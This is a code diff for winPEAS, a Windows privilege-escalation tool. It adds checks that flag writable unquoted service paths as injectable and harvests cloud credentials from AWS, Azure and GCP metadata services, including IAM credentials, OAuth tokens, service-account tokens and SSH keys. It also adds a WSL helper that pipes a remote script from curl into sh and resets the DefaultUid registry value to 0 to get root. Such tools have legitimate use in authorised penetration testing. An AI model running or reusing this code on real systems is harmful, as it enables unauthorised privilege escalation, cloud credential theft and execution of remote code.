$" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" +
$" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR);
} }
@ -290,8 +297,7 @@ namespace winPEAS.Helpers
string value = entry.Value; string value = entry.Value;
string key = entry.Key; string key = entry.Key;
string line = ""; string line;
if (!no_gray) if (!no_gray)
{ {
line = ansi_color_gray + " " + key + ": " + NOCOLOR + value; line = ansi_color_gray + " " + key + ": " + NOCOLOR + value;

45
winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
View File

@ -122,6 +122,51 @@ namespace winPEAS.Helpers
return binaryPath; return binaryPath;
} }
public static bool CheckQuoteAndSpaceWithPermissions(string path, out List<string> injectablePaths)
{
List<string> result = new List<string>();
bool isInjectable = false;
if (!path.Contains('"') && !path.Contains("'"))
{
if (path.Contains(" "))
{
string currentPath = string.Empty;
foreach (var pathPart in Regex.Split(path, @"\s"))
{
currentPath += pathPart + " ";
if (File.Exists(currentPath) || Directory.Exists(currentPath))
{
var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (permissions.Any())
{
result.Add(currentPath);
isInjectable = true;
}
}
else
{
var firstPathPart = currentPath;
DirectoryInfo di = new DirectoryInfo(firstPathPart);
var exploitablePath = di.Parent.FullName;
var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (folderPermissions.Any())
{
result.Add(exploitablePath);
isInjectable = true;
};
}
}
}
}
injectablePaths = result.Select(i => i).Distinct().ToList();
return isInjectable;
}
public static bool CheckQuoteAndSpace(string path) public static bool CheckQuoteAndSpace(string path)
{ {
if (!path.Contains('"') && !path.Contains("'")) if (!path.Contains('"') && !path.Contains("'"))

34
winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
View File

@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry
return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path); return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
} }
public static bool WriteRegValue(string hive, string path, string keyName, string value)
{
try
{
RegistryKey regKey;
if (hive == "HKCU")
{
regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path);
}
else if (hive == "HKU")
{
regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path);
}
else
{
regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
if (regKey == null)
{
return false;
}
regKey.SetValue(keyName, value, RegistryValueKind.String);
}
catch (Exception ex)
{
return false;
}
return true;
}
public static string GetRegValue(string hive, string path, string value) public static string GetRegValue(string hive, string path, string value)
{ {
// returns a single registry value under the specified path in the specified hive (HKLM/HKCU) // returns a single registry value under the specified path in the specified hive (HKLM/HKCU)

43
winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
View File

@ -5,8 +5,10 @@ using System.IO;
using System.Linq; using System.Linq;
using System.Management; using System.Management;
using System.Text.RegularExpressions; using System.Text.RegularExpressions;
using winPEAS.Checks;
using winPEAS.Helpers; using winPEAS.Helpers;
using winPEAS.Helpers.Registry; using winPEAS.Helpers.Registry;
using winPEAS.Helpers.YamlConfig;
namespace winPEAS.Info.ApplicationInfo namespace winPEAS.Info.ApplicationInfo
{ {
@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo
{ {
} }
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
results.Add(new Dictionary<string, string>() results.Add(new Dictionary<string, string>()
{ {
{"Reg", autorunLocation[0] + "\\" + autorunLocation[1]}, {"Reg", autorunLocation[0] + "\\" + autorunLocation[1]},
@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights", "interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
}, },
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()} {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
} }
@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo
orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", ""); orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", "");
string folder = Path.GetDirectoryName(orig_filepath); string folder = Path.GetDirectoryName(orig_filepath);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths);
results.Add(new Dictionary<string, string>() results.Add(new Dictionary<string, string>()
{ {
{"Reg", autorunLocation[0] + "\\" + reg}, {"Reg", autorunLocation[0] + "\\" + reg},
@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights", "interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
}, },
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()} {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
} }
@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo
string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE")); string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
usersPath = Directory.GetParent(usersPath).FullName; usersPath = Directory.GetParent(usersPath).FullName;
var config = YamlConfigHelper.GetWindowsSearchConfig();
var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value;
// add .* around each element to match the whole line
var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*");
pwdInsideHistory = string.Join("|", items);
try try
{ {
if (Directory.Exists(usersPath)) if (Directory.Exists(usersPath))
@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo
foreach (string filepath in files) foreach (string filepath in files)
{ {
var fileContent = File.ReadAllText(filepath);
var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false);
// remove all non-printable and control characters
sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList();
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
string folder = Path.GetDirectoryName(filepath); string folder = Path.GetDirectoryName(filepath);
results.Add(new Dictionary<string, string>() { results.Add(new Dictionary<string, string>() {
{ "Reg", "" }, { "Reg", "" },
@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""}, { "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" },
{ "sensitiveInfoList", string.Join(", ", sensitiveInfoList) },
}); });
} }
} }
@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo
{ {
try try
{ {
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths);
results.Add(new Dictionary<string, string>() { results.Add(new Dictionary<string, string>() {
{ "Reg", "" }, { "Reg", "" },
{ "RegKey", "" }, { "RegKey", "" },
@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""}, { "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", ""}, { "interestingFileRights", ""},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() } {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
catch (Exception) catch (Exception)
@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo
try try
{ {
string folder = Path.GetDirectoryName(filepathCleaned); string folder = Path.GetDirectoryName(filepathCleaned);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths);
results.Add(new Dictionary<string, string>() results.Add(new Dictionary<string, string>()
{ {
{"Reg", ""}, {"Reg", ""},
@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights", "interestingFileRights",
string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs)) string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))
}, },
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()} {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
catch (Exception) catch (Exception)
@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo
if (File.Exists(path)) if (File.Exists(path))
{ {
string folder = Path.GetDirectoryName(path); string folder = Path.GetDirectoryName(path);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths);
results.Add(new Dictionary<string, string> results.Add(new Dictionary<string, string>
{ {
@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""}, { "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
} }

201
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs Normal file
View File

@ -0,0 +1,201 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class AWSInfo : CloudInfoBase
{
/*
* notes - possible identification:
*
- "c:\Program Files\Amazon\EC2Launch"
- "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
- "c:\Program Files (x86)\AWS SDK for .NET"
- get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ"
*/
const string AWS_FOLDER = "c:\\Program Files\\Amazon\\";
const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token";
const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data";
public override string Name => "AWS EC2";
private Dictionary<string, List<EndpointData>> _endpointData = null;
public override bool IsCloud => Directory.Exists(AWS_FOLDER);
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } });
_endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN));
_endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN));
_endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN));
_endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN));
_endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN));
_endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN));
/*
* print_3title "SSM Runnig"
ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
*
*/
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetSecurityCredentialsMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetUserDataMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("user-data", "latest/user-data", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetIAMRoleMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>
{
new Tuple<string, string, bool>("iam/info", "iam/info", false)
};
var url = $"{METADATA_URL_BASE}/iam/security-credentials/";
var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
foreach (var role in roles.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>(role, $"iam/security-credentials/{role}", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetNetworkMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var url = $"{METADATA_URL_BASE}/network/interfaces/macs/";
var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
var urlBase = "network/interfaces/macs";
foreach (var mac in macs.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Owner ID", $"{urlBase}/{mac}/owner-id", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public Hostname", $"{urlBase}/{mac}/public-hostname", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Security Groups", $"{urlBase}/{mac}/security-groups", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetAccountMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("account info", "identity-credentials/ec2/info", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetGeneralMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ami id", "ami-id", false),
new Tuple<string, string, bool>("instance action","instance-action", false),
new Tuple<string, string, bool>("instance id","instance-id", false),
new Tuple<string, string, bool>("instance life-cycle","instance-life-cycle", false),
new Tuple<string, string, bool>("instance type","instance-type", false),
new Tuple<string, string, bool>("placement/region","placement/region", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData, string apiToken)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null;
}
}
}

88
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs Normal file
View File

@ -0,0 +1,88 @@
using System.Collections.Generic;
using System.IO;
using System.Net;
using System;
namespace winPEAS.Info.CloudInfo
{
internal class AzureInfo : CloudInfoBase
{
public override string Name => "Azure VM";
public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure";
const string AZURE_BASE_URL = "http://169.254.169.254/metadata/";
const string API_VERSION = "2021-12-13";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
List<EndpointData> _endpointDataList = new List<EndpointData>();
try
{
string result;
List<Tuple<string, string, bool>> endpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Details", $"instance?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true),
new Tuple<string, string, bool>("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true),
new Tuple<string, string, bool>("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true),
new Tuple<string, string, bool>("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true)
};
if (IsAvailable)
{
foreach (var tuple in endpoints)
{
string url = $"{AZURE_BASE_URL}{tuple.Item2}";
result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
}
else
{
foreach (var endpoint in endpoints)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = endpoint.Item1,
Data = null,
IsAttackVector = false
});
}
}
_endpointData.Add("General", _endpointDataList);
}
catch (Exception ex)
{
}
}
return _endpointData;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null;
}
}
}

77
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs Normal file
View File

@ -0,0 +1,77 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace winPEAS.Info.CloudInfo
{
internal abstract class CloudInfoBase
{
public abstract string Name { get; }
public abstract bool IsCloud { get; }
public abstract Dictionary<string, List<EndpointData>> EndpointDataList();
public abstract bool TestConnection();
private bool? _isAvailable;
public bool IsAvailable
{
get
{
if (_isAvailable == null)
{
_isAvailable = TestConnection();
}
return _isAvailable.Value;
}
}
protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null)
{
try
{
var request = WebRequest.CreateHttp(url);
if (headers != null)
{
request.Headers = headers;
}
request.Method = method;
using (var response = (HttpWebResponse)request.GetResponse())
{
using (var responseStream = response.GetResponseStream())
{
// Get a reader capable of reading the response stream
using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8))
{
// Read stream content as string
var content = myStreamReader.ReadToEnd();
return content;
}
}
}
}
catch (WebException exception)
{
if (exception.InnerException != null)
{
return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty;
}
}
catch (Exception ex)
{
return string.Empty;
}
return string.Empty;
}
}
}

10
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs Normal file
View File

@ -0,0 +1,10 @@
namespace winPEAS.Info.CloudInfo
{
internal class EndpointData
{
public string EndpointName { get; set; }
public string Data { get; set; }
public bool IsAttackVector { get; set; }
}
}

208
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs Normal file
View File

@ -0,0 +1,208 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class GCPInfo : CloudInfoBase
{
public override string Name => "Google Cloud Platform";
const string GCP_BASE_URL = "http://{URL_BASE}/";
const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\";
/*
C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe"
C:\Program Files\Google\OSConfig\google_osconfig_agent.exe"
c:\Program Files (x86)\Google\Cloud SDK"
http://metadata.google.internal
*/
public override bool IsCloud => Directory.Exists(GCP_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
_endpointData.Add("GC Project Info", GetGCProjectMetadataInfo());
_endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo());
_endpointData.Add("Instance Info", GetInstanceMetadataInfo());
_endpointData.Add("Interfaces", GetInterfacesMetadataInfo());
_endpointData.Add("User Data", GetUserMetadataInfo());
_endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo());
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetServiceAccountsMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var serviceAccountsEndpointUrlBase = "instance/service-accounts";
var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}";
var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
// TODO
// echo " Name: $sa" - ignored for now
foreach (var serviceAccount in serviceAccounts.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetUserMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("startup-script", "instance/attributes/startup-script", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInterfacesMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var networkEndpointUrlBase = "instance/network-interfaces";
var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}";
var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
foreach (var iface in ifaces.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("IP", $"{networkEndpointUrlBase}/{iface}ip", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Network", $"{networkEndpointUrlBase}/{iface}network", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInstanceMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Description", "instance/description", false),
new Tuple<string, string, bool>("Hostname", "instance/hostname", false),
new Tuple<string, string, bool>("Instance ID", "instance/id", false),
new Tuple<string, string, bool>("Instance Image", "instance/image", false),
new Tuple<string, string, bool>("Machine Type", "instance/machine-type", false),
new Tuple<string, string, bool>("Instance Name", "instance/name", false),
new Tuple<string, string, bool>("Instance tags", "instance/scheduling/tags", false),
new Tuple<string, string, bool>("Zone", "instance/zone", false),
new Tuple<string, string, bool>("K8s Cluster Location", "instance/attributes/cluster-location", false),
new Tuple<string, string, bool>("K8s Cluster name", "instance/attributes/cluster-name", false),
new Tuple<string, string, bool>("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false),
new Tuple<string, string, bool>("K8s Kube-labels", "instance/attributes/kube-labels", false),
new Tuple<string, string, bool>("K8s Kubeconfig", "instance/attributes/kubeconfig", false),
new Tuple<string, string, bool>("K8s Kube-env", "instance/attributes/kube-env", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetOSLoginMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("OSLogin users", "oslogin/users", false),
new Tuple<string, string, bool>("OSLogin Groups", "oslogin/groups", false),
new Tuple<string, string, bool>("OSLogin Security Keys", "oslogin/security-keys", false),
new Tuple<string, string, bool>("OSLogin Authorize", "oslogin/authorize", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetGCProjectMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Project-ID", "project/project-id", false),
new Tuple<string, string, bool>("Project Number", "project/numeric-project-id", false),
new Tuple<string, string, bool>("Project SSH-Keys", "project/attributes/ssh-keys", false),
new Tuple<string, string, bool>("All Project Attributes", "project/attributes/?recursive=true", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result?.Trim(),
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null;
}
}
}

136
winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs Normal file
View File

@ -0,0 +1,136 @@
using System;
using System.Diagnostics;
using System.Text;
using winPEAS.Helpers.Registry;
namespace winPEAS.Info.FilesInfo.WSL
{
public class WSLHelper
{
public static void RunLinpeas(string linpeasUrl)
{
string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
var cmd = CreateUnixCommand(linpeasCmd);
ExecuteCommand(cmd.Item1, cmd.Item2);
}
internal static Tuple<string, string> CreateUnixCommand(string command, string distributionName = null)
{
string wsl = Environment.Is64BitProcess
? "wsl.exe"
: Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe";
string distributionParam = !string.IsNullOrEmpty(distributionName)
? $"--distribution {distributionName}"
: string.Empty;
string args = $"{distributionParam} -- {command}";
return new Tuple<string, string>(wsl, args);
}
static string GetWSLUser(string distributionName)
{
string command = "whoami";
var cmd = CreateUnixCommand(command, distributionName);
var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim();
return user;
}
internal static string TryGetRootUser(string distributionName, string distributionGuid)
{
string hive = "HKCU";
string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}";
string key = "DefaultUid";
string wslUser = GetWSLUser(distributionName);
string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0";
string root = $"root ({exploit})";
if (string.Equals(wslUser, "root"))
{
return "root";
}
var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
wslUser = GetWSLUser(distributionName);
if (string.Equals(wslUser, "root"))
{
RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
return root;
}
}
// try sudo without password
exploit = "sudo with empty password";
